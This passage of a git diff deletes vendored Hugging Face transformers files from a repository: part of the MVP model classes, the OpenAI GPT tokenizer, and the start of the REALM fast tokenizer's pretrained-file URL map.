- """, - MVP_START_DOCSTRING, -) -class MvpForSequenceClassification(MvpPreTrainedModel): - _tied_weights_keys = ["encoder.embed_tokens.weight", "decoder.embed_tokens.weight"] - - def __init__(self, config: MvpConfig, **kwargs): - super().__init__(config, **kwargs) - self.model = MvpModel(config) - self.classification_head = MvpClassificationHead( - config.d_model, - config.d_model, - config.num_labels, - config.classifier_dropout, - ) - - # Initialize weights and apply final processing - self.post_init() - - def set_lightweight_tuning(self): - self.model.set_lightweight_tuning() - self.classification_head.requires_grad_(False) - - @add_start_docstrings_to_model_forward(MVP_INPUTS_DOCSTRING) - @add_end_docstrings(MVP_SEQUENCE_CLASSIFICATION_SAMPLE) - def forward( - self, - input_ids: torch.LongTensor = None, - attention_mask: Optional[torch.Tensor] = None, - decoder_input_ids: Optional[torch.LongTensor] = None, - decoder_attention_mask: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.Tensor] = None, - decoder_head_mask: Optional[torch.Tensor] = None, - cross_attn_head_mask: Optional[torch.Tensor] = None, - encoder_outputs: Optional[List[torch.FloatTensor]] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - decoder_inputs_embeds: Optional[torch.FloatTensor] = None, - labels: Optional[torch.LongTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, Seq2SeqSequenceClassifierOutput]: - r""" - labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for computing the sequence classification/regression loss. Indices should be in `[0, ..., - config.num_labels - 1]`. If `config.num_labels > 1` a classification loss is computed (Cross-Entropy). 
- """ - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - if labels is not None: - use_cache = False - - if input_ids is None and inputs_embeds is not None: - raise NotImplementedError( - f"Passing input embeddings is currently not supported for {self.__class__.__name__}" - ) - - outputs = self.model( - input_ids, - attention_mask=attention_mask, - decoder_input_ids=decoder_input_ids, - decoder_attention_mask=decoder_attention_mask, - head_mask=head_mask, - decoder_head_mask=decoder_head_mask, - cross_attn_head_mask=cross_attn_head_mask, - encoder_outputs=encoder_outputs, - inputs_embeds=inputs_embeds, - decoder_inputs_embeds=decoder_inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - hidden_states = outputs[0] # last hidden state - - eos_mask = input_ids.eq(self.config.eos_token_id).to(hidden_states.device) - - if len(torch.unique_consecutive(eos_mask.sum(1))) > 1: - raise ValueError("All examples must have the same number of tokens.") - sentence_representation = hidden_states[eos_mask, :].view(hidden_states.size(0), -1, hidden_states.size(-1))[ - :, -1, : - ] - logits = self.classification_head(sentence_representation) - - loss = None - if labels is not None: - if self.config.problem_type is None: - if self.config.num_labels == 1: - self.config.problem_type = "regression" - elif self.config.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int): - self.config.problem_type = "single_label_classification" - else: - self.config.problem_type = "multi_label_classification" - - if self.config.problem_type == "regression": - loss_fct = MSELoss() - if self.config.num_labels == 1: - loss = loss_fct(logits.squeeze(), labels.squeeze()) - else: - loss = loss_fct(logits, labels) - elif self.config.problem_type == "single_label_classification": - loss_fct = CrossEntropyLoss() - loss = loss_fct(logits.view(-1, self.config.num_labels), labels.view(-1)) - elif self.config.problem_type == "multi_label_classification": - loss_fct = BCEWithLogitsLoss() - loss = loss_fct(logits, labels) - if not return_dict: - output = (logits,) + outputs[1:] - return ((loss,) + output) if loss is not None else output - - return Seq2SeqSequenceClassifierOutput( - loss=loss, - logits=logits, - past_key_values=outputs.past_key_values, - decoder_hidden_states=outputs.decoder_hidden_states, - decoder_attentions=outputs.decoder_attentions, - cross_attentions=outputs.cross_attentions, - encoder_last_hidden_state=outputs.encoder_last_hidden_state, - encoder_hidden_states=outputs.encoder_hidden_states, - encoder_attentions=outputs.encoder_attentions, - ) - - -@add_start_docstrings( - """ - MVP Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear layer - on top of the hidden-states output to compute `span start logits` and `span end logits`). 
- """, - MVP_START_DOCSTRING, -) -class MvpForQuestionAnswering(MvpPreTrainedModel): - _tied_weights_keys = ["encoder.embed_tokens.weight", "decoder.embed_tokens.weight"] - - def __init__(self, config): - super().__init__(config) - - config.num_labels = 2 - self.num_labels = config.num_labels - - self.model = MvpModel(config) - self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels) - - # Initialize weights and apply final processing - self.post_init() - - def set_lightweight_tuning(self): - self.model.set_lightweight_tuning() - self.qa_outputs.requires_grad_(False) - - @add_start_docstrings_to_model_forward(MVP_INPUTS_DOCSTRING) - @add_end_docstrings(MVP_QUESTION_ANSWERING_SAMPLE) - def forward( - self, - input_ids: torch.Tensor = None, - attention_mask: Optional[torch.Tensor] = None, - decoder_input_ids: Optional[torch.LongTensor] = None, - decoder_attention_mask: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.Tensor] = None, - decoder_head_mask: Optional[torch.Tensor] = None, - cross_attn_head_mask: Optional[torch.Tensor] = None, - encoder_outputs: Optional[List[torch.FloatTensor]] = None, - start_positions: Optional[torch.LongTensor] = None, - end_positions: Optional[torch.LongTensor] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - decoder_inputs_embeds: Optional[torch.FloatTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, Seq2SeqQuestionAnsweringModelOutput]: - r""" - start_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for position (index) of the start of the labelled span for computing the token classification loss. - Positions are clamped to the length of the sequence (*sequence_length*). Position outside of the sequence - are not taken into account for computing the loss. - end_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for position (index) of the end of the labelled span for computing the token classification loss. - Positions are clamped to the length of the sequence (*sequence_length*). Position outside of the sequence - are not taken into account for computing the loss. 
- """ - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - if start_positions is not None and end_positions is not None: - use_cache = False - - outputs = self.model( - input_ids, - attention_mask=attention_mask, - decoder_input_ids=decoder_input_ids, - decoder_attention_mask=decoder_attention_mask, - head_mask=head_mask, - decoder_head_mask=decoder_head_mask, - cross_attn_head_mask=cross_attn_head_mask, - encoder_outputs=encoder_outputs, - inputs_embeds=inputs_embeds, - decoder_inputs_embeds=decoder_inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - sequence_output = outputs[0] - - logits = self.qa_outputs(sequence_output) - start_logits, end_logits = logits.split(1, dim=-1) - start_logits = start_logits.squeeze(-1).contiguous() - end_logits = end_logits.squeeze(-1).contiguous() - - total_loss = None - if start_positions is not None and end_positions is not None: - # If we are on multi-GPU, split add a dimension - if len(start_positions.size()) > 1: - start_positions = start_positions.squeeze(-1) - if len(end_positions.size()) > 1: - end_positions = end_positions.squeeze(-1) - # sometimes the start/end positions are outside our model inputs, we ignore these terms - ignored_index = start_logits.size(1) - start_positions = start_positions.clamp(0, ignored_index) - end_positions = end_positions.clamp(0, ignored_index) - - loss_fct = CrossEntropyLoss(ignore_index=ignored_index) - start_loss = loss_fct(start_logits, start_positions) - end_loss = loss_fct(end_logits, end_positions) - total_loss = (start_loss + end_loss) / 2 - - if not return_dict: - output = ( - start_logits, - end_logits, - ) + outputs[1:] - return ((total_loss,) + output) if total_loss is not None else output - - return Seq2SeqQuestionAnsweringModelOutput( - loss=total_loss, - start_logits=start_logits, - end_logits=end_logits, - past_key_values=outputs.past_key_values, - decoder_hidden_states=outputs.decoder_hidden_states, - decoder_attentions=outputs.decoder_attentions, - cross_attentions=outputs.cross_attentions, - encoder_last_hidden_state=outputs.encoder_last_hidden_state, - encoder_hidden_states=outputs.encoder_hidden_states, - encoder_attentions=outputs.encoder_attentions, - ) - - -# Copied from transformers.models.bart.modeling_bart.BartDecoderWrapper with Bart->Mvp -class MvpDecoderWrapper(MvpPreTrainedModel): - """ - This wrapper class is a helper class to correctly load pretrained checkpoints when the causal language model is - used in combination with the [`EncoderDecoderModel`] framework. 
- """ - - def __init__(self, config): - super().__init__(config) - self.decoder = MvpDecoder(config) - - def forward(self, *args, **kwargs): - return self.decoder(*args, **kwargs) - - -class MvpForCausalLM(MvpPreTrainedModel): - _tied_weights_keys = ["lm_head.weight"] - - def __init__(self, config): - config = copy.deepcopy(config) - config.is_decoder = True - config.is_encoder_decoder = False - super().__init__(config) - self.model = MvpDecoderWrapper(config) - - self.lm_head = nn.Linear(config.hidden_size, config.vocab_size, bias=False) - - # Initialize weights and apply final processing - self.post_init() - - def get_input_embeddings(self): - return self.model.decoder.embed_tokens - - def set_input_embeddings(self, value): - self.model.decoder.embed_tokens = value - - def get_output_embeddings(self): - return self.lm_head - - def set_output_embeddings(self, new_embeddings): - self.lm_head = new_embeddings - - def set_decoder(self, decoder): - self.model.decoder = decoder - - def get_decoder(self): - return self.model.decoder - - def set_lightweight_tuning(self): - self.model.set_lightweight_tuning() - self.lm_head.requires_grad_(False) - - @replace_return_docstrings(output_type=CausalLMOutputWithCrossAttentions, config_class=_CONFIG_FOR_DOC) - def forward( - self, - input_ids: torch.LongTensor = None, - attention_mask: Optional[torch.Tensor] = None, - encoder_hidden_states: Optional[torch.FloatTensor] = None, - encoder_attention_mask: Optional[torch.FloatTensor] = None, - head_mask: Optional[torch.Tensor] = None, - cross_attn_head_mask: Optional[torch.Tensor] = None, - past_key_values: Optional[List[torch.FloatTensor]] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - labels: Optional[torch.LongTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, CausalLMOutputWithCrossAttentions]: - r""" - Args: - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you - provide it. - - Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are input IDs?](../glossary#input-ids) - attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*): - Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention - if the model is configured as a decoder. - encoder_attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used - in the cross-attention if the model is configured as a decoder. Mask values selected in `[0, 1]`: - head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. 
- - cross_attn_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the cross-attention modules. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - past_key_values (`tuple(tuple(torch.FloatTensor))`, *optional*, returned when `use_cache=True` is passed or when `config.use_cache=True`): - Tuple of `tuple(torch.FloatTensor)` of length `config.n_layers`, with each tuple having 2 tensors of - shape `(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of - shape `(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`. The two additional - tensors are only required when the model is used as a decoder in a Sequence to Sequence model. - - Contains pre-computed hidden-states (key and values in the self-attention blocks and in the - cross-attention blocks) that can be used (see `past_key_values` input) to speed up sequential decoding. - - If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those - that don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of - all `decoder_input_ids` of shape `(batch_size, sequence_length)`. - labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*): - Labels for computing the masked language modeling loss. Indices should either be in `[0, ..., - config.vocab_size]` or -100 (see `input_ids` docstring). Tokens with indices set to `-100` are ignored - (masked), the loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`. - use_cache (`bool`, *optional*): - If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding - (see `past_key_values`). - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more detail. - output_hidden_states (`bool`, *optional*): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more detail. - return_dict (`bool`, *optional*): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. 
- - Returns: - - Example: - - ```python - >>> from transformers import AutoTokenizer, MvpForCausalLM - - >>> tokenizer = AutoTokenizer.from_pretrained("RUCAIBox/mvp") - >>> model = MvpForCausalLM.from_pretrained("RUCAIBox/mvp", add_cross_attention=False) - - >>> inputs = tokenizer("Hello, my dog is cute", return_tensors="pt") - >>> outputs = model(**inputs) - - >>> logits = outputs.logits - >>> list(logits.shape) - [1, 8, 50267] - ```""" - - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - # decoder outputs consists of (dec_features, layer_state, dec_hidden, dec_attn) - outputs = self.model.decoder( - input_ids=input_ids, - attention_mask=attention_mask, - encoder_hidden_states=encoder_hidden_states, - encoder_attention_mask=encoder_attention_mask, - head_mask=head_mask, - cross_attn_head_mask=cross_attn_head_mask, - past_key_values=past_key_values, - inputs_embeds=inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - logits = self.lm_head(outputs[0]) - - loss = None - if labels is not None: - loss_fct = CrossEntropyLoss() - loss = loss_fct(logits.view(-1, self.config.vocab_size), labels.view(-1)) - - if not return_dict: - output = (logits,) + outputs[1:] - return (loss,) + output if loss is not None else output - - return CausalLMOutputWithCrossAttentions( - loss=loss, - logits=logits, - past_key_values=outputs.past_key_values, - hidden_states=outputs.hidden_states, - attentions=outputs.attentions, - cross_attentions=outputs.cross_attentions, - ) - - def prepare_inputs_for_generation( - self, input_ids, past_key_values=None, attention_mask=None, use_cache=None, **kwargs - ): - # if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly - if attention_mask is None: - attention_mask = input_ids.new_ones(input_ids.shape) - - if past_key_values: - input_ids = input_ids[:, -1:] - # first step, decoder_cached_states are empty - return { - "input_ids": input_ids, # encoder_outputs is defined. input_ids not needed - "attention_mask": attention_mask, - "past_key_values": past_key_values, - "use_cache": use_cache, - } - - @staticmethod - def _reorder_cache(past_key_values, beam_idx): - reordered_past = () - for layer_past in past_key_values: - reordered_past += ( - tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past), - ) - return reordered_past diff --git a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/openai/tokenization_openai.py b/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/openai/tokenization_openai.py deleted file mode 100644 index cfdeb3207a6d9674f194faed6c674bf023e056f4..0000000000000000000000000000000000000000 --- a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/openai/tokenization_openai.py +++ /dev/null @@ -1,405 +0,0 @@ -# coding=utf-8 -# Copyright 2018 The Open AI Team Authors and The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. 
-# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -"""Tokenization classes for OpenAI GPT.""" - - -import json -import os -import re -import unicodedata -from typing import Optional, Tuple - -from ...tokenization_utils import PreTrainedTokenizer, _is_control, _is_punctuation, _is_whitespace -from ...utils import logging - - -logger = logging.get_logger(__name__) - -VOCAB_FILES_NAMES = { - "vocab_file": "vocab.json", - "merges_file": "merges.txt", -} - -PRETRAINED_VOCAB_FILES_MAP = { - "vocab_file": {"openai-gpt": "https://huggingface.co/openai-gpt/resolve/main/vocab.json"}, - "merges_file": {"openai-gpt": "https://huggingface.co/openai-gpt/resolve/main/merges.txt"}, -} - -PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = { - "openai-gpt": 512, -} - - -# Copied from transformers.models.bert.tokenization_bert.whitespace_tokenize -def whitespace_tokenize(text): - """Runs basic whitespace cleaning and splitting on a piece of text.""" - text = text.strip() - if not text: - return [] - tokens = text.split() - return tokens - - -# Copied from transformers.models.bert.tokenization_bert.BasicTokenizer -class BasicTokenizer(object): - """ - Constructs a BasicTokenizer that will run basic tokenization (punctuation splitting, lower casing, etc.). - - Args: - do_lower_case (`bool`, *optional*, defaults to `True`): - Whether or not to lowercase the input when tokenizing. - never_split (`Iterable`, *optional*): - Collection of tokens which will never be split during tokenization. Only has an effect when - `do_basic_tokenize=True` - tokenize_chinese_chars (`bool`, *optional*, defaults to `True`): - Whether or not to tokenize Chinese characters. - - This should likely be deactivated for Japanese (see this - [issue](https://github.com/huggingface/transformers/issues/328)). - strip_accents (`bool`, *optional*): - Whether or not to strip all accents. If this option is not specified, then it will be determined by the - value for `lowercase` (as in the original BERT). - do_split_on_punc (`bool`, *optional*, defaults to `True`): - In some instances we want to skip the basic punctuation splitting so that later tokenization can capture - the full context of the words, such as contractions. - """ - - def __init__( - self, - do_lower_case=True, - never_split=None, - tokenize_chinese_chars=True, - strip_accents=None, - do_split_on_punc=True, - ): - if never_split is None: - never_split = [] - self.do_lower_case = do_lower_case - self.never_split = set(never_split) - self.tokenize_chinese_chars = tokenize_chinese_chars - self.strip_accents = strip_accents - self.do_split_on_punc = do_split_on_punc - - def tokenize(self, text, never_split=None): - """ - Basic Tokenization of a piece of text. For sub-word tokenization, see WordPieceTokenizer. - - Args: - never_split (`List[str]`, *optional*) - Kept for backward compatibility purposes. Now implemented directly at the base class level (see - [`PreTrainedTokenizer.tokenize`]) List of token not to split. - """ - # union() returns a new set by concatenating the two sets. 
- never_split = self.never_split.union(set(never_split)) if never_split else self.never_split - text = self._clean_text(text) - - # This was added on November 1st, 2018 for the multilingual and Chinese - # models. This is also applied to the English models now, but it doesn't - # matter since the English models were not trained on any Chinese data - # and generally don't have any Chinese data in them (there are Chinese - # characters in the vocabulary because Wikipedia does have some Chinese - # words in the English Wikipedia.). - if self.tokenize_chinese_chars: - text = self._tokenize_chinese_chars(text) - # prevents treating the same character with different unicode codepoints as different characters - unicode_normalized_text = unicodedata.normalize("NFC", text) - orig_tokens = whitespace_tokenize(unicode_normalized_text) - split_tokens = [] - for token in orig_tokens: - if token not in never_split: - if self.do_lower_case: - token = token.lower() - if self.strip_accents is not False: - token = self._run_strip_accents(token) - elif self.strip_accents: - token = self._run_strip_accents(token) - split_tokens.extend(self._run_split_on_punc(token, never_split)) - - output_tokens = whitespace_tokenize(" ".join(split_tokens)) - return output_tokens - - def _run_strip_accents(self, text): - """Strips accents from a piece of text.""" - text = unicodedata.normalize("NFD", text) - output = [] - for char in text: - cat = unicodedata.category(char) - if cat == "Mn": - continue - output.append(char) - return "".join(output) - - def _run_split_on_punc(self, text, never_split=None): - """Splits punctuation on a piece of text.""" - if not self.do_split_on_punc or (never_split is not None and text in never_split): - return [text] - chars = list(text) - i = 0 - start_new_word = True - output = [] - while i < len(chars): - char = chars[i] - if _is_punctuation(char): - output.append([char]) - start_new_word = True - else: - if start_new_word: - output.append([]) - start_new_word = False - output[-1].append(char) - i += 1 - - return ["".join(x) for x in output] - - def _tokenize_chinese_chars(self, text): - """Adds whitespace around any CJK character.""" - output = [] - for char in text: - cp = ord(char) - if self._is_chinese_char(cp): - output.append(" ") - output.append(char) - output.append(" ") - else: - output.append(char) - return "".join(output) - - def _is_chinese_char(self, cp): - """Checks whether CP is the codepoint of a CJK character.""" - # This defines a "chinese character" as anything in the CJK Unicode block: - # https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block) - # - # Note that the CJK Unicode block is NOT all Japanese and Korean characters, - # despite its name. The modern Korean Hangul alphabet is a different block, - # as is Japanese Hiragana and Katakana. Those alphabets are used to write - # space-separated words, so they are not treated specially and handled - # like the all of the other languages. 
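        # For example, ord("中") == 0x4E2D falls inside the 0x4E00-0x9FFF block below and is treated as a CJK
        # character, while ord("a") == 0x61 falls outside every listed range and is not.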
- if ( - (cp >= 0x4E00 and cp <= 0x9FFF) - or (cp >= 0x3400 and cp <= 0x4DBF) # - or (cp >= 0x20000 and cp <= 0x2A6DF) # - or (cp >= 0x2A700 and cp <= 0x2B73F) # - or (cp >= 0x2B740 and cp <= 0x2B81F) # - or (cp >= 0x2B820 and cp <= 0x2CEAF) # - or (cp >= 0xF900 and cp <= 0xFAFF) - or (cp >= 0x2F800 and cp <= 0x2FA1F) # - ): # - return True - - return False - - def _clean_text(self, text): - """Performs invalid character removal and whitespace cleanup on text.""" - output = [] - for char in text: - cp = ord(char) - if cp == 0 or cp == 0xFFFD or _is_control(char): - continue - if _is_whitespace(char): - output.append(" ") - else: - output.append(char) - return "".join(output) - - -def get_pairs(word): - """ - Return set of symbol pairs in a word. word is represented as tuple of symbols (symbols being variable-length - strings) - """ - pairs = set() - prev_char = word[0] - for char in word[1:]: - pairs.add((prev_char, char)) - prev_char = char - return pairs - - -def text_standardize(text): - """ - fixes some issues the spacy tokenizer had on books corpus; also does some whitespace standardization - """ - text = text.replace("—", "-") - text = text.replace("–", "-") - text = text.replace("―", "-") - text = text.replace("…", "...") - text = text.replace("´", "'") - text = re.sub(r"""(-+|~+|!+|"+|;+|\?+|\++|,+|\)+|\(+|\\+|\/+|\*+|\[+|\]+|}+|{+|\|+|_+)""", r" \1 ", text) - text = re.sub(r"\s*\n\s*", " \n ", text) - text = re.sub(r"[^\S\n]+", " ", text) - return text.strip() - - -class OpenAIGPTTokenizer(PreTrainedTokenizer): - """ - Construct a GPT Tokenizer. Based on Byte-Pair-Encoding with the following peculiarities: - - - lowercases all inputs, - - uses `SpaCy` tokenizer and `ftfy` for pre-BPE tokenization if they are installed, falling back to BERT's - `BasicTokenizer` if not. - - This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to - this superclass for more information regarding those methods. - - Args: - vocab_file (`str`): - Path to the vocabulary file. - merges_file (`str`): - Path to the merges file. - unk_token (`str`, *optional*, defaults to `"<unk>"`): - The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this - token instead. 
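    Example (a minimal sketch; the exact sub-word split depends on the checkpoint's merges file and on whether
    `ftfy`/`spacy` are installed):

    ```python
    >>> from transformers import OpenAIGPTTokenizer

    >>> tokenizer = OpenAIGPTTokenizer.from_pretrained("openai-gpt")
    >>> tokenizer.tokenize("Hello world")
    ['hello</w>', 'world</w>']
    ```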
- """ - - vocab_files_names = VOCAB_FILES_NAMES - pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP - max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES - model_input_names = ["input_ids", "attention_mask"] - - def __init__(self, vocab_file, merges_file, unk_token="", **kwargs): - try: - import ftfy - from spacy.lang.en import English - - _nlp = English() - self.nlp = _nlp.tokenizer - self.fix_text = ftfy.fix_text - except ImportError: - logger.warning("ftfy or spacy is not installed using BERT BasicTokenizer instead of SpaCy & ftfy.") - self.nlp = BasicTokenizer(do_lower_case=True) - self.fix_text = None - - with open(vocab_file, encoding="utf-8") as vocab_handle: - self.encoder = json.load(vocab_handle) - self.decoder = {v: k for k, v in self.encoder.items()} - with open(merges_file, encoding="utf-8") as merges_handle: - merges = merges_handle.read().split("\n")[1:-1] - merges = [tuple(merge.split()) for merge in merges] - self.bpe_ranks = dict(zip(merges, range(len(merges)))) - self.cache = {} - - super().__init__(unk_token=unk_token, **kwargs) - - @property - def do_lower_case(self): - return True - - @property - def vocab_size(self): - return len(self.encoder) - - def get_vocab(self): - return dict(self.encoder, **self.added_tokens_encoder) - - def bpe(self, token): - word = tuple(token[:-1]) + (token[-1] + "",) - if token in self.cache: - return self.cache[token] - pairs = get_pairs(word) - - if not pairs: - return token + "" - - while True: - bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf"))) - if bigram not in self.bpe_ranks: - break - first, second = bigram - new_word = [] - i = 0 - while i < len(word): - try: - j = word.index(first, i) - except ValueError: - new_word.extend(word[i:]) - break - else: - new_word.extend(word[i:j]) - i = j - - if word[i] == first and i < len(word) - 1 and word[i + 1] == second: - new_word.append(first + second) - i += 2 - else: - new_word.append(word[i]) - i += 1 - new_word = tuple(new_word) - word = new_word - if len(word) == 1: - break - else: - pairs = get_pairs(word) - word = " ".join(word) - if word == "\n ": - word = "\n" - self.cache[token] = word - return word - - def _tokenize(self, text): - """Tokenize a string.""" - split_tokens = [] - if self.fix_text is None: - # Using BERT's BasicTokenizer - text = self.nlp.tokenize(text) - for token in text: - split_tokens.extend(list(self.bpe(token).split(" "))) - else: - # Using SpaCy & ftfy (original tokenization process of OpenAI GPT) - text = self.nlp(text_standardize(self.fix_text(text))) - for token in text: - split_tokens.extend(list(self.bpe(token.text.lower()).split(" "))) - return split_tokens - - def _convert_token_to_id(self, token): - """Converts a token (str) in an id using the vocab.""" - return self.encoder.get(token, self.encoder.get(self.unk_token)) - - def _convert_id_to_token(self, index): - """Converts an id in a token (BPE) using the vocab.""" - return self.decoder.get(index, self.unk_token) - - def convert_tokens_to_string(self, tokens): - """Converts a sequence of tokens (string) in a single string.""" - out_string = "".join(tokens).replace("", " ").strip() - return out_string - - def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]: - if not os.path.isdir(save_directory): - logger.error(f"Vocabulary path ({save_directory}) should be a directory") - return - vocab_file = os.path.join( - save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"] - 
) - merge_file = os.path.join( - save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"] - ) - - with open(vocab_file, "w", encoding="utf-8") as f: - f.write(json.dumps(self.encoder, indent=2, sort_keys=True, ensure_ascii=False) + "\n") - - index = 0 - with open(merge_file, "w", encoding="utf-8") as writer: - writer.write("#version: 0.2\n") - for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]): - if index != token_index: - logger.warning( - f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive." - " Please check that the tokenizer is not corrupted!" - ) - index = token_index - writer.write(" ".join(bpe_tokens) + "\n") - index += 1 - - return vocab_file, merge_file diff --git a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/realm/tokenization_realm_fast.py b/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/realm/tokenization_realm_fast.py deleted file mode 100644 index 59b23f45ee0b30e842ffcd9aeed158927bba6dbf..0000000000000000000000000000000000000000 --- a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/realm/tokenization_realm_fast.py +++ /dev/null @@ -1,321 +0,0 @@ -# coding=utf-8 -# Copyright 2022 The REALM authors and The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
-"""Fast Tokenization classes for REALM.""" - -import json -from typing import List, Optional, Tuple - -from tokenizers import normalizers - -from ...tokenization_utils_base import BatchEncoding -from ...tokenization_utils_fast import PreTrainedTokenizerFast -from ...utils import PaddingStrategy, logging -from .tokenization_realm import RealmTokenizer - - -logger = logging.get_logger(__name__) - -VOCAB_FILES_NAMES = {"vocab_file": "vocab.txt", "tokenizer_file": "tokenizer.json"} - -PRETRAINED_VOCAB_FILES_MAP = { - "vocab_file": { - "google/realm-cc-news-pretrained-embedder": ( - "https://huggingface.co/google/realm-cc-news-pretrained-embedder/resolve/main/vocab.txt" - ), - "google/realm-cc-news-pretrained-encoder": ( - "https://huggingface.co/google/realm-cc-news-pretrained-encoder/resolve/main/vocab.txt" - ), - "google/realm-cc-news-pretrained-scorer": ( - "https://huggingface.co/google/realm-cc-news-pretrained-scorer/resolve/main/vocab.txt" - ), - "google/realm-cc-news-pretrained-openqa": ( - "https://huggingface.co/google/realm-cc-news-pretrained-openqa/aresolve/main/vocab.txt" - ), - "google/realm-orqa-nq-openqa": "https://huggingface.co/google/realm-orqa-nq-openqa/resolve/main/vocab.txt", - "google/realm-orqa-nq-reader": "https://huggingface.co/google/realm-orqa-nq-reader/resolve/main/vocab.txt", - "google/realm-orqa-wq-openqa": "https://huggingface.co/google/realm-orqa-wq-openqa/resolve/main/vocab.txt", - "google/realm-orqa-wq-reader": "https://huggingface.co/google/realm-orqa-wq-reader/resolve/main/vocab.txt", - }, - "tokenizer_file": { - "google/realm-cc-news-pretrained-embedder": ( - "https://huggingface.co/google/realm-cc-news-pretrained-embedder/resolve/main/tokenizer.jsont" - ), - "google/realm-cc-news-pretrained-encoder": ( - 